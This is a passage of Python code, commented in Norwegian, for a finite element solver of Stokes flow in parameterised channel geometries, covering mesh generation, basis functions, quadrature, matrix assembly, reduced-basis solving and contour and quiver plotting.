np.concatenate((p,newp),axis = 0)\n mesh = np.concatenate((mesh,newmesh),axis = 0)\n\n position += .6\n halfcircles -= 1\n\n while rectangles != 0:\n newp, newmesh, edge, south, east, north, west = meshMaker(position,position + .4,.7,.7 + rectangleheight, 4*resolution,2*resolution,edgepoints=True)\n newp, newmesh = nodeReplacer(p,newp,south,newmesh)\n p = np.concatenate((p,newp),axis = 0)\n mesh = np.concatenate((mesh,newmesh),axis = 0)\n\n position += .6\n rectangles -= 1\n\n pfx = p[:,0]\n pfy = p[:,1]\n\n pflip = np.vstack((pfx,1-pfy)).T\n pflip = pflip[np.asarray(south).max()+1:]\n meshflip = [[x + len(pflip) if x > np.asarray(south).max() else x for x in sub] for sub in mesh]\n p = np.concatenate((p,pflip,),axis = 0)\n mesh = np.concatenate((mesh,meshflip),axis = 0)\n\n return p, mesh, edge\n\n\n#returnerer koeffisientene til de bikvadratiske basisfunksjonene\ndef phiSq(points,el):\n phi_el = np.ones((9,9))\n for i,p in enumerate(points[el]):\n phi_el[i] = [1,p[0],p[1],p[0]*p[1],p[0]**2,p[1]**2,(p[0]**2)*p[1],p[0]*(p[1]**2),(p[0]**2)*(p[1]**2)]\n basis_coeffs = np.zeros((9,9))\n\n for a in range(9):\n b = np.zeros(9)\n b[a] = 1\n c = np.linalg.solve(phi_el,b)\n basis_coeffs[a] = c\n return basis_coeffs\n\n#returnerer koeffisientene til de bilineære basisfunksjonene\ndef phiLin(points,el):\n phi_el = np.ones((4,4))\n for i,p in enumerate(points[el]):\n phi_el[i] = [1,p[0],p[1],p[0]*p[1]]\n basis_coeffs = np.zeros((4,4))\n\n #basis_functions: konstantene til hver basisfunksjon for elementet: [[C1,C1x,C1y],[C2,C2x,C2y],[C3,C3x,C3y]] \n for a in range(4):\n b = np.zeros(4)\n b[a] = 1\n c = np.linalg.solve(phi_el,b) \n basis_coeffs[a] = c\n return basis_coeffs\n\n#numerisk integrasjonsfunksjon\nN1 = lambda zeta,eta: .25*(1-zeta)*(1-eta)\nN2 = lambda zeta,eta: .25*(1+zeta)*(1-eta)\nN3 = lambda zeta,eta: .25*(1+zeta)*(1+eta)\nN4 = lambda zeta,eta: .25*(1-zeta)*(1+eta)\nN0 = lambda zeta,eta: [N1(zeta,eta),N2(zeta,eta),N3(zeta,eta),N4(zeta,eta)]\ndx = lambda x: [x[1]-x[0],x[2]-x[3]]\ndy = lambda y: [y[3]-y[0],y[2]-y[1]]\ndeta = lambda eta: [1-eta,1+eta]\ndet = lambda zeta,eta,x,y: (1/16)*np.dot(dx(x),deta(eta))*np.dot(dy(y),deta(zeta))- (1/16)*np.dot(dx(y),deta(eta))*np.dot(dy(x),deta(zeta))\nev = lambda zeta,eta,evi: np.dot(evi,N0(zeta,eta))\n\ndef gauss2D(integrand,p,el,i,j,c1 = 0,c2 = 0,multibasis = False,degree = 4):\n p1,p2,p3,p4 = p[el[0]],p[el[1]],p[el[3]],p[el[2]]\n xi = [p1[0],p2[0],p3[0],p4[0]]\n yi = [p1[1],p2[1],p3[1],p4[1]]\n\n integral = 0\n if degree ==3:\n weights = [5/9,8/9,5/9]\n eval_pts = [-np.sqrt(3/5),0,np.sqrt(3/5)]\n if degree == 4:\n w1 = (18-np.sqrt(30))/36\n w2 = (18+np.sqrt(30))/36\n ev1 = np.sqrt((3/7)-(2/7)*np.sqrt(6/5))\n ev2 = np.sqrt((3/7)+(2/7)*np.sqrt(6/5))\n weights = [w1,w2,w2,w1]\n eval_pts = [-ev2,-ev1,ev1,ev2]\n for w1,ev1 in zip(weights,eval_pts):\n for w2,ev2 in zip(weights,eval_pts):\n if multibasis:\n integral += w1*w2*det(ev1,ev2,xi,yi)*integrand(ev(ev1,ev2,xi),ev(ev1,ev2,yi),c1,c2,i,j)\n else:\n integral += w1*w2*det(ev1,ev2,xi,yi)*integrand(ev(ev1,ev2,xi),ev(ev1,ev2,yi),c2,i,j)\n return integral\n\n#maskeringsfunksjon for plotting\ndef apply_mask(triang,p, alpha=0.1,coord_mask = False):\n if coord_mask:\n x = p[triang.triangles,0].mean(axis=1) \n y = p[triang.triangles,1].mean(axis=1)\n cond1 = np.logical_and(x < .4, y > .2)\n cond2 = np.logical_and(x > .6,y >.2)\n #cond2 = np.logical_and(y < .15, y > .05)\n #mask = np.logical_and(cond1,cond2)\n # apply masking\n triang.set_mask(cond2)\n else:\n # Mask triangles with sidelength bigger some alpha\n triangles = triang.triangles\n # Mask off unwanted triangles.\n xtri = p[triangles,0] - np.roll(p[triangles,0], 1, axis=1)\n ytri = p[triangles,1] - np.roll(p[triangles,1], 1, axis=1)\n maxi = np.max(np.sqrt(xtri**2 + ytri**2),axis=1)\n # apply masking\n triang.set_mask(maxi > alpha)\n\n#hjelpefunksjon for generering av stivhets- og divergensmatriser\ndef submat(points,el,int_func,multibasis = False):\n if multibasis:\n c1 = phiLin(points,el[0])\n c2 = phiSq(points,el[1])\n dim1 = len(c1)\n dim2 = len(c2)\n else:\n c2 = phiSq(points,el[1])\n dim1 = len(c2)\n dim2 = dim1\n a_el = np.zeros((dim1,dim2))\n for i in range(dim1):\n for j in range(dim2):\n if multibasis:\n a_el[i,j] += gauss2D(int_func,points,el[0],i,j,c1 = c1,c2 = c2,multibasis =multibasis)\n else:\n a_el[i,j] += gauss2D(int_func,points,el[0],i,j,c2 = c2)\n return a_el\n\n#genererer stivhetsmatrisa\ndef createA(int_func,points,elements):\n A = sp.lil_matrix((len(points),len(points)))\n for el in elements:\n a_el = submat(points,el,int_func)\n for i,ai in enumerate(el[1]):\n for j,aj in enumerate(el[1]):\n A[ai,aj] += a_el[i,j]\n return A\n\n#genererer divergensmatrisa \ndef createD(int_func,points,elements):\n B = sp.lil_matrix((len(points),len(points)))\n for el in elements:\n a_el = submat(points,el,int_func,multibasis=True)\n for i,ai in enumerate(el[0]):\n for j,aj in enumerate(el[1]):\n B[ai,aj] += a_el[i,j]\n return B\n\n#samlefunksjon for å genere Noder, elementer, kanter og indre noder, gitt type domene\ndef createDomain(N,typ = 0):\n x = np.linspace(0,1,int(5*(2**N)+1))\n y = np.linspace(0,1,int(5*(2**N)+1))\n X,Y = np.meshgrid(x,y)\n\n px = X.ravel()\n py = Y.ravel()\n origpts = np.vstack((px,py)).T\n if typ == 0:\n points = origpts[origpts[:,1] <.20005]\n elements,lin_set = typeZeroDom(points,N)\n non_homog_dir,homog_dir,neumann = typeZeroBdry(points,N)\n elif typ == 1:\n points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(np.logical_and(origpts[:,0] > .39995,origpts[:,0] < .60005),origpts[:,1]<.40005))]\n elements,lin_set = typeOneDom(points,N)\n non_homog_dir,homog_dir,neumann = typeOneBdry(points,N)\n elif typ == 2:\n points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(np.logical_and(origpts[:,0] > .39995,origpts[:,0] < .60005),origpts[:,1]<.60005))]\n elements,lin_set = typeTwoDom(points,N)\n non_homog_dir,homog_dir,neumann = typeTwoBdry(points,N)\n elif typ == 3:\n points = origpts[np.logical_or(np.logical_and(origpts[:,1] <.20005,origpts[:,0] < .60005),np.logical_and(np.logical_and(origpts[:,0] > .39995,origpts[:,0] < .60005),origpts[:,1]<.60005))]\n elements,lin_set = typeThreeDom(points,N)\n non_homog_dir,homog_dir,neumann = typeThreeBdry(points,N)\n elif typ == 4:\n points = origpts[np.logical_or(np.logical_and(origpts[:,1] <.20005,origpts[:,0] < .60005),np.logical_and(np.logical_and(origpts[:,0] > .39995,origpts[:,0] < .60005),origpts[:,1]<.60005))]\n points = np.vstack((-points[:,1]+.6,points[:,0]-.4)).T\n elements,lin_set = typeThreeDom(points,N)\n neumann,homog_dir,non_homog_dir = typeThreeBdry(points,N)\n elif typ == 5:\n points = origpts[origpts[:,1] <.20005]\n elements,lin_set = typeFiveDom(points,N)\n non_homog_dir,homog_dir,neumann = typeZeroBdry(points,N)\n homog_dir = np.concatenate((np.array(np.where(np.logical_and(np.logical_and(points[:,0]< 0.550005,points[:,0]> 0.449995),np.logical_and(points[:,1]< 0.150005,points[:,1]> 0.049995))))[0],homog_dir))\n elif typ == 6:\n points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(origpts[:,1] <.40005,origpts[:,0] <.60005))]\n elements,lin_set = typeSixDom(points,N)\n non_homog_dir,homog_dir,neumann = typeSixBdry(points,N)\n elif typ == 7:\n points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(origpts[:,1] <.40005,origpts[:,0] <.60005))]\n points[:,0] = 1 - points[:,0]\n elements,lin_set = typeSixDom(points,N)\n neumann,homog_dir,non_homog_dir = typeSixBdry(points,N)\n\n #definerer indre noder\n inner = np.array([i for i in range(len(points))])\n inner = inner[~np.isin(inner, np.concatenate((non_homog_dir,homog_dir)))]\n return points,elements,lin_set,non_homog_dir,homog_dir, neumann,inner\n\n#fjerner ønskede rader og kolonner fra inputmatrisa\ndef matrixShaver(Mat,rows,cols):\n Out = Mat[rows]\n Out = Out[:,cols]\n return Out\n\n#hjelpefunksjon\ndef solHelper(sol,lift,inner,points,non_homog):\n uxinner = sol[:len(inner)]\n uyinner = sol[len(inner):2*len(inner)]\n p = sol[2*len(inner):]\n ux = np.zeros(len(points))\n uy = np.zeros(len(points))\n ux[inner] = uxinner\n ux[non_homog] = lift\n uy[inner] = uyinner\n return ux,uy,p\n\ndef solHelper2(sol_r,RB_mat,points,non_homog,inner,lift):\n RB1 = RB_mat[:len(inner)]\n RB2 = RB_mat[len(inner):2*len(inner)]\n RB3 = RB_mat[2*len(inner):]\n temp = RB_mat.shape[1]\n\n uxr = sol_r[:temp]\n uyr = sol_r[temp:2*temp]\n pr = sol_r[2*temp:]\n uxinner = RB1@uxr\n uyinner = RB2@uyr\n p = RB3@pr\n\n ux = np.zeros(len(points))\n uy = np.zeros(len(points))\n ux[inner] = uxinner\n ux[non_homog] = lift\n uy[inner] = uyinner\n return ux,uy,p\n\n#hjelpefunksjon\ndef plotHelp(points,N,mu_max):\n tri = mtri.Triangulation(points[:,0],points[:,1])\n apply_mask(tri,points,alpha= ((1+mu_max)*0.3)/(2**(N)),coord_mask=True)\n return tri\n\n#plottefunksjoner\ndef contourPlotter(u,tri,title = \"title\",fname = \"filename\",newfig = True,save = True,cbar = True):\n if newfig:\n plt.figure()\n plt.title(title)\n ax1 = plt.tricontourf(tri,u,levels = 50,cmap = 'rainbow')\n #ax2 = plt.tricontour(tri,u,levels = 20,colors = 'black',linewidths=0.25)\n plt.axis('scaled')\n if cbar:\n plt.colorbar(ax1)\n if save:\n plt.savefig(fname, dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\ndef quiverPlotter(ux,uy,points,title = \"title\",fname = \"filename\",newfig = True, save = True):\n if newfig:\n plt.figure()\n plt.title(title)\n ax2 = plt.quiver(points[:,0],points[:,1],ux,uy)\n plt.axis('scaled')\n if save:\n plt.savefig(fname, dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\ndef initialize(inlet_velocity,N = 4,typ = 0,mu3=0,mu4=0):\n #variabler, mu1 er amplitude på hastighetsprofil, mu2 er dynamsik viskositet\n mu1 = 150\n\n #definerer basisfunksjoner\n phi = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y + c[i][3]*x*y + c[i][4]*(x**2) + c[i][5]*(y**2) + c[i][6]*(x**2)*y + c[i][7]*x*(y**2) +c[i][8]*(x**2)*(y**2)\n phi_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y + 2*c[i][4]*x + 2*c[i][6]*x*y + c[i][7]*(y**2) + 2*c[i][8]*x*(y**2)\n phi_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x + 2*c[i][5]*y + c[i][6]*(x**2) + 2*c[i][7]*x*y+ 2*c[i][8]*(x**2)*y\n\n zeta = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y +c[i][3]*x*y\n zeta_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y\n zeta_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x\n\n a_bilin = lambda x,y,c,i,j: (1/mu1)*(phi_dx(x,y,c,j)*phi_dx(x,y,c,i) + phi_dy(x,y,c,j)*phi_dy(x,y,c,i))\n b_bilin_x = lambda x,y,c1,c2,i,j: -phi_dx(x,y,c2,j)*zeta(x,y,c1,i)\n b_bilin_y = lambda x,y,c1,c2,i,j: -phi_dy(x,y,c2,j)*zeta(x,y,c1,i)\n\n #type domene: 0, 1, 2, 3, 4, 5\n points,elements,lin_set,non_homog,homog,neu,inner = createDomain(N,typ)\n o1 = [0,.4]\n o2 = [.4,.6]\n o3 = [.6,1]\n\n cond1 = np.logical_and(points[:,0] >= o1[0],points[:,0] < o1[1])\n cond2 = np.logical_and(points[:,0] >= o2[0],points[:,0] < o2[1])\n cond3 = np.logical_and(points[:,0] >= o3[0],points[:,0] <= o3[1])\n\n points[cond1,1] = mu3*(points[cond1,1]-.1) + points[cond1,1]\n points[cond2,1] = mu3*5*(o2[1]-points[cond2,0])*(points[cond2,1]-.1) + mu4*5*(points[cond2,0]-o2[0])*(points[cond2,1]-.1) + points[cond2,1]\n points[cond3,1] = mu4*(points[cond3,1]-.1) + points[cond3,1]\n\n #bygger stivhets- og divergensmatrisene\n A = createA(a_bilin,points,elements)\n Dx = createD(b_bilin_x,points,elements)\n Dy = createD(b_bilin_y,points,elements)\n\n #definerer lifting-funksjonen\n rg = inlet_velocity\n\n #fjerner nødvendige rader og kollonner\n Ai = matrixShaver(A,inner,inner)\n Dxi = matrixShaver(Dx,lin_set,inner)\n Dyi = matrixShaver(Dy,lin_set,inner)\n Gx = matrixShaver(Dx,lin_set,non_homog)\n G = matrixShaver(A,inner,non_homog)\n\n #lager høyresiden\n fx = -G@rg\n fy = np.zeros_like(fx)\n fp = -Gx@rg\n rhs = np.concatenate((fx,fy,fp))\n\n #bygger blokkmatrisa og løser\n Block = sp.bmat([[Ai,None,Dxi.T],[None,Ai,Dyi.T],[Dxi,Dyi,None]]).tocsr()\n u_bar = solver(Block,rhs)\n ux,uy,p = solHelper(u_bar,rg,inner,points,non_homog)\n\n print(\"total out volumeflow\")\n if typ == 2:\n print(sum(np.sqrt(ux[neu]**2 + uy[neu]**2))/len(neu)*.4)\n else:\n print(sum(np.sqrt(ux[neu]**2+uy[neu]**2))/len(neu)*(.2+.2*mu4))\n print(\"total in volumeflow\")\n print(sum(np.sqrt(ux[non_homog]**2 + uy[non_homog]**2))/len(non_homog)*(.2+.2*mu3))\n\n #generer triangulering og maskerer for enklere plotting \n return ux,uy,p, points,elements,lin_set,neu\n\ndef get_velocity_type(N,typ,mu3):\n points,elements,lin_set,non_homog,homog,neu,inner = createDomain(N,typ)\n return points[non_homog][:,1] + mu3*(points[non_homog][:,1]-.1)\n\ndef omega(p):\n x = p[0]\n y = p[1]\n if x <= .45 and y <= .05:\n return 0\n elif y < .05 and x > .45 and x < .55:\n return 1\n elif y <= .05 and x >= .55:\n return 2\n elif x < .45 and y > .05 and y < .15:\n return 3\n elif x > .55 and y > .05 and y < .15:\n return 4\n elif x <= .45 and y >= .15:\n return 5\n elif y > .15 and x > .45 and x < .55:\n return 6\n elif y >= .15 and x >= .55:\n return 7\n else:\n return -1\n\n#genererer stivhetsmatrisa\ndef createSubA(int_func,points,elements,domain):\n A = sp.lil_matrix((len(points),len(points)))\n for el in elements:\n if omega(points[el[1][4]]) == domain:\n a_el = submat(points,el,int_func)\n for i,ai in enumerate(el[1]):\n for j,aj in enumerate(el[1]):\n A[ai,aj] += a_el[i,j]\n elif omega(points[el[1][4]]) == -1:\n print(\"invalid point!\")\n return A\n return A\n\ndef createSubD(int_func,points,elements,domain):\n B = sp.lil_matrix((len(points),len(points)))\n for el in elements:\n if omega(points[el[1][4]]) == domain:\n a_el = submat(points,el,int_func,multibasis=True)\n for i,ai in enumerate(el[0]):\n for j,aj in enumerate(el[1]):\n B[ai,aj] += a_el[i,j]\n elif omega(points[el[1][4]]) == -1:\n print(\"invalid point!\")\n return B\n return B\n\ndef sparseSolver(Ax_set,Ay_set,Dx_set,Dy_set,Ax_rhs_set,Ay_rhs_set,Dx_rhs_set,q1,q2,q3,q4,mu,points,lin_set,non_homog,inner):\n A = sp.lil_matrix((len(inner),len(inner)))\n A_rhs = sp.lil_matrix((len(inner),len(non_homog)))\n for Ax,Ay,Ax_rhs,Ay_rhs,qx,qy in zip(Ax_set,Ay_set,Ax_rhs_set,Ay_rhs_set,q1,q2):\n A += qx*Ax\n A += qy*Ay\n A_rhs += qx*Ax_rhs\n A_rhs += qy*Ay_rhs\n\n Dx = sp.lil_matrix((len(lin_set),len(inner)))\n Dy = sp.lil_matrix((len(lin_set),len(inner)))\n D_rhs = sp.lil_matrix((len(lin_set),len(non_homog)))\n for D_x,D_y,Dx_rhs,qx,qy in zip(Dx_set,Dy_set,Dx_rhs_set,q3,q4):\n Dx += qx*D_x\n Dy += qy*D_y\n D_rhs += qx*Dx_rhs\n \n y_n = points[non_homog,1]\n\n c = -mu[3]/((1+mu[2])**2)\n rg = y_n*0\n for i,y in enumerate(y_n):\n if omega([0,y]) == 0:\n rg[i] = (20*mu[2]*y + 10*y)*(20*mu[2]*y + 10*y -2 -2*mu[2])\n if omega([0,y]) == 3:\n rg[i] = (10*y + mu[2])*(10*y -2 -mu[2])\n if omega([0,y]) == 5:\n rg[i] = (20*mu[2]*y + 10*y - 2*mu[2])*(20*mu[2]*y + 10*y -2 -4*mu[2])\n\n rg = c*rg\n\n #lager høyresiden\n fx = -A_rhs@rg\n fy = np.zeros_like(fx)\n fp = -D_rhs@rg\n rhs = np.concatenate((fx,fy,fp))\n\n #bygger blokkmatrisa og løser\n Block = sp.bmat([[A,None,Dx.T],[None,A,Dy.T],[Dx,Dy,None]]).tocsr()\n u_bar = solver(Block,rhs)\n return u_bar\n\ndef reducedSolver(Ax_r1,Ax_r2,Ay_r1,Ay_r2,Dx_r,Dy_r,DxT_r,DyT_r,Ax_rhs_r,Ay_rhs_r,Dx_rhs_r,q1,q2,q3,q4,mu,points,non_homog):\n A1 = sp.lil_matrix(Ax_r1[0].shape)\n A2 = sp.lil_matrix(Ax_r2[0].shape)\n A_rhs = sp.lil_matrix(Ax_rhs_r[0].shape)\n for Ax1,Ax2,Ay1,Ay2,Ax_rhs,Ay_rhs,qx,qy in zip(Ax_r1,Ax_r2,Ay_r1,Ay_r2,Ax_rhs_r,Ay_rhs_r,q1,q2):\n A1 += qx*Ax1\n A1 += qy*Ay1\n A2 += qx*Ax2\n A2 += qy*Ay2\n A_rhs += qx*Ax_rhs\n A_rhs += qy*Ay_rhs\n\n Dx = sp.lil_matrix(Dx_r[0].shape)\n Dy = sp.lil_matrix(Dy_r[0].shape)\n DxT = sp.lil_matrix(DxT_r[0].shape)\n DyT = sp.lil_matrix(DyT_r[0].shape)\n D_rhs = sp.lil_matrix(Dx_rhs_r[0].shape)\n for D_x,D_y,D_xT,D_yT,Dx_rhs,qx,qy in zip(Dx_r,Dy_r,DxT_r,DyT_r,Dx_rhs_r,q3,q4):\n Dx += qx*D_x\n Dy += qy*D_y\n DxT += qx*D_xT\n DyT += qy*D_yT\n D_rhs += qx*Dx_rhs\n \n y_n = points[non_homog,1]\n\n c = -mu[3]/((1+mu[2])**2)\n rg = y_n*0\n for i,y in enumerate(y_n):\n if omega([0,y]) == 0:\n rg[i] = (20*mu[2]*y + 10*y)*(20*mu[2]*y + 10*y -2 -2*mu[2])\n if omega([0,y]) == 3:\n rg[i] = (10*y + mu[2])*(10*y -2 -mu[2])\n if omega([0,y]) == 5:\n rg[i] = (20*mu[2]*y + 10*y - 2*mu[2])*(20*mu[2]*y + 10*y -2 -4*mu[2])\n\n rg = c*rg\n\n #lager høyresiden\n fx = -A_rhs@rg\n fy = np.zeros_like(fx)\n fp = -D_rhs@rg\n rhs = np.concatenate((fx,fy,fp))\n\n #bygger blokkmatrisa og løser\n Block = sp.bmat([[A1,None,DxT],[None,A2,DyT],[Dx,Dy,None]]).tocsr()\n u_bar = solver(Block,rhs)\n return u_bar\n\n\n#x_e = [0,-1,2,-2,3,0,1,1]\n\n#Nmat = N(1,1)\n\n#dx = lambda x: [x[1]-x[0],x[2]-x[3]]\n#dy = lambda y: [y[3]-y[0],y[2]-y[1]]\n\n#x = [0,2,2,0]\n#y = [0,-2,0,2]\n\n#m = [3,4,5]\n\n#print(max(m))\n\n\n\n'''\nstarttime = time.time()\np, mesh, edge = domainCreator(2, 2,2,.5,.8)\nprint(\"Nodes:\",len(p))\nprint(\"time:\",time.time()-starttime)\n\nplt.figure(1)\nplotElements(p,mesh)\nplt.axis('scaled')\nplt.savefig(\"testmesh\", dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\n#plt.figure(2)\n#plotPoints(p)\n#plt.savefig(\"testpoints\", dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\nplt.close(\"all\")\n\n\nmu3 = 1\nmu5 = 2\n\nJ1 = np.asmatrix([[mu3+1,0],[0,2*mu5 +1]])\n\npoints = [3,3,3]\nA = [sp.lil_matrix((len(points),len(points))) for i in range(5)]\nA[0][0,0] = 1\nprint(A[0].todense())\nomega_list = [[0,1],[2,3],[4,5],[6,7],[8,9],[10,11],[12,13],[14,15]]\nprint(len(omega_list))\n\ndef sparsesolver3(bilin,lin,N,dirichlet,qs):\n\n bilin_sum = sp.lil_matrix((N,N))\n for i in range(len(qs)):\n bilin_sum += bilin[i]*qs[i]\n\n #fjerner dirichlet-noder\n bilin_sum[dirichlet,:] = 0\n bilin_sum[dirichlet,dirichlet] = 1\n lin[dirichlet] = 0\n #løser\n sparse_A = sp.csr_matrix(bilin_sum)\n sparse_sol = solver(sparse_A,lin)\n solution = np.asarray(sparse_sol)\n #legger inn løsningen av ligningssystemet på riktig plass, i.e. setter dirichlet-nodene til verdi 0.\n solution[dirichlet] = 0\n return solution\n\n\n\n\ndef typeSixBdry(points,N):\n non_homo_dir1 = [i*(5*(2**N)+1) for i in range(1,(2**N)+1)] \n non_homo_dir2 = [i*(3*(2**N)+1)+((2**N)+1)*(5*(2**N)+1) for i in range((2**N)-1)]\n non_homo_dir = np.concatenate((non_homo_dir1,non_homo_dir2)) \n homo_dir1 = [i for i in range(5*(2**N)+1)]\n homo_dir2 = [i for i in range(((2**N)-1)*(3*(2**N)+1)+((2**N)+1)*(5*(2**N)+1),len(points))]\n homo_dir3 = [i for i in range((2**N)*(5*(2**N)+1)+3*(2**N),(2**N)*(5*(2**N)+1)+5*(2**N)+1)]\n homo_dir4 = [i*(3*(2**N)+1)+((2**N)+1)*(5*(2**N)+1)-1 for i in range(1,(2**N))]\n homo_dir = np.concatenate((homo_dir1,homo_dir2,homo_dir3,homo_dir4))\n homo_neu = [i*(5*(2**N)+1)-1 for i in range(2,2**N+1)]\n return np.asarray(non_homo_dir), np.asarray(np.sort(homo_dir)), np.asarray(homo_neu)\n\ndef typeSixDom(points,N):\n i = 0\n r = 1\n elements = []\n lin = []\n sq = []\n lin_vec = []\n while r != (2**N)+1:\n lin = np.asarray([i,i+2,i+(10*(2**N)+2),i+(10*(2**N)+4)])\n sq = np.asarray([i,i+1,i+2,i+(5*(2**N)+1),i+(5*(2**N)+2),i+(5*(2**N)+3),i+(10*(2**N)+2),i+(10*(2**N)+3),i+(10*(2**N)+4)])\n el = [lin,sq]\n elements.append(el)\n lin_vec = np.concatenate((lin_vec,lin))\n i += 2\n if i==(5*(2**N))*r + r -1:\n i += 5*(2**N) +2\n r += 2\n \n r = 1\n ti = i\n while r != (2**N) +1:\n if r == 1:\n lin = np.asarray([i,i+2,i+4*2*(2**N)+2,i+4*2*(2**N)+4])\n sq = np.asarray([i, i+1,i+2,i+5*(2**N)+1,i+5*(2**N)+2,i+5*(2**N)+3,i+4*2*(2**N)+2,i+4*2*(2**N)+3,i+4*2*(2**N)+4])\n el = [lin,sq]\n elements.append(el)\n lin_vec = np.concatenate((lin_vec,lin))\n else:\n lin = np.asarray([i,i+2,i+2*3*(2**N)+2,i+2*3*(2**N)+4])\n sq = np.asarray([i,i+1,i+2,i+3*(2**N)+1,i+3*(2**N)+2,i+3*(2**N)+3,i+2*3*(2**N)+2,i+2*3*(2**N)+3,i+2*3*(2**N)+4])\n el = [lin,sq]\n elements.append(el)\n lin_vec = np.concatenate((lin_vec,lin))\n i += 2\n if i == ti + 3*(2**N):\n if r == 1:\n i += 5*(2**N)+2\n r += 2\n ti = i\n else:\n i += 3*(2**N)+2\n r += 2\n ti = i\n return elements, np.array(list(set(lin_vec)),dtype=int)\n\nN =3\n\nx = np.linspace(0,1,int(5*(2**N)+1))\ny = np.linspace(0,1,int(5*(2**N)+1))\nX,Y = np.meshgrid(x,y)\n\npx = X.ravel()\npy = Y.ravel()\norigpts = np.vstack((px,py)).T\n\n#points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(origpts[:,1] <.40005,origpts[:,0] <.60005))]\n#points[:,0] = 1 - points[:,0]\n#elements,lin_set = typeSixDom(points,N)\n#non_homog_dir,homog_dir,neumann = typeSixBdry(points,N)\n\n#definerer basisfunksjoner\nphi = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y + c[i][3]*x*y + c[i][4]*(x**2) + c[i][5]*(y**2) + c[i][6]*(x**2)*y + c[i][7]*x*(y**2) +c[i][8]*(x**2)*(y**2)\nphi_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y + 2*c[i][4]*x + 2*c[i][6]*x*y + c[i][7]*(y**2) + 2*c[i][8]*x*(y**2)\nphi_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x + 2*c[i][5]*y + c[i][6]*(x**2) + 2*c[i][7]*x*y+ 2*c[i][8]*(x**2)*y\n\nzeta = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y +c[i][3]*x*y\nzeta_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y\nzeta_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x\n\na_bilin = lambda x,y,c,i,j: (phi_dx(x,y,c,j)*phi_dx(x,y,c,i) + phi_dy(x,y,c,j)*phi_dy(x,y,c,i))\nb_bilin_x = lambda x,y,c1,c2,i,j: -phi_dx(x,y,c2,j)*zeta(x,y,c1,i)\nb_bilin_y = lambda x,y,c1,c2,i,j: -phi_dy(x,y,c2,j)*zeta(x,y,c1,i)\n\n#generer noder, elementer, kanter og indre noder\nN = 4\n#type domene: 0, 1, 2, 3, 4, 5\ntyp = 6\npoints,elements,lin_set,non_homog,homog,neu,inner = createDomain(N,typ)\n\n#bygger stivhets- og divergensmatrisene\nA = createA(a_bilin,points,elements)\nDx = createD(b_bilin_x,points,elements)\nDy = createD(b_bilin_y,points,elements)\n\n#definerer lifting-funksjonen\ny_n = points[non_homog][:,1]\n\nrg = 100*(y_n)*(0.4-y_n)\n\n#fjerner nødvendige rader og kollonner\nAi = matrixShaver(A,inner,inner)\nDxi = matrixShaver(Dx,lin_set,inner)\nDyi = matrixShaver(Dy,lin_set,inner)\nGx = matrixShaver(Dx,lin_set,non_homog)\nG = matrixShaver(A,inner,non_homog)\n\n#lager høyresiden\nfx = -G@rg\nfy = np.zeros_like(fx)\nfp = -Gx@rg\nrhs = np.concatenate((fx,fy,fp))\n\n#bygger blokkmatrisa og løser\nBlock = sp.bmat([[Ai,None,Dxi.T],[None,Ai,Dyi.T],[Dxi,Dyi,None]]).tocsr()\nu_bar = solver(Block,rhs)\nux,uy,p = solHelper(u_bar,rg,inner,points,non_homog)\n\n#generer triangulering og maskerer for enklere plotting \ntri1 = plotHelp(points,N,1)\ntri2 = plotHelp(points[lin_set],N-1,1)\n\n\n#figur 0, domene\nplt.figure()\nplotElements(points,elements)\nplt.title('Domain w/bilinear and biquadratic elements')\nplt.axis('scaled')\nplt.savefig(\"figur0_type\"+str(typ), dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n#figur1, hastighetsfelt og trykk\ncontourPlotter(p,tri2,title = \"Velocity and pressure\",save = False)\nquiverPlotter(ux[lin_set],uy[lin_set],points[lin_set],fname=\"figur1_type\"+str(typ), newfig = False)\n#figur2, x-hastighet\ncontourPlotter(ux,tri1,title=\"x-velocity, $u_x$\",fname=\"figur2_type\"+str(typ))\n#figur3, y-hastighet\ncontourPlotter(uy,tri1,title=\"y-velocity, $u_y$\",fname=\"figur3_type\"+str(typ))\n#figur4, hastighetsmagnitude\ncontourPlotter(np.sqrt(ux**2 + uy**2),tri1,title=\"Velocity-magnitude, $|u|$\",fname=\"figur4_type\"+str(typ))\n#figur5, hastighetsfelt\nquiverPlotter(ux,uy,points,fname=\"figur5_type\"+str(typ),title= \"Velocity-field\")\n#figur6, trykk\ncontourPlotter(p,tri2,title=\"Pressure, p\",fname=\"figur6_type\"+str(typ))\n\nplt.close('all')\n\n\n#plt.figure()\n#plotElements(points,elements)\n#plt.title('Domain w/bilinear and biquadratic elements')\n#for i,p in enumerate(points):\n# plt.annotate(i,p)\n#plt.axis('scaled')\n#plt.savefig(\"aaa_type\"+str(1), dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\n'''\n\n'''\nif something:\n points_list = np.asarray(points_list)\n i = 0\n for S,points in zip(S_mat,points_list):\n tri1 = plotHelp(points,N,1)\n vel_mag = np.sqrt(S[:len(points)]**2 + S[len(points):2*len(points)]**2)\n press = S[2*len(points):]\n tri2 = 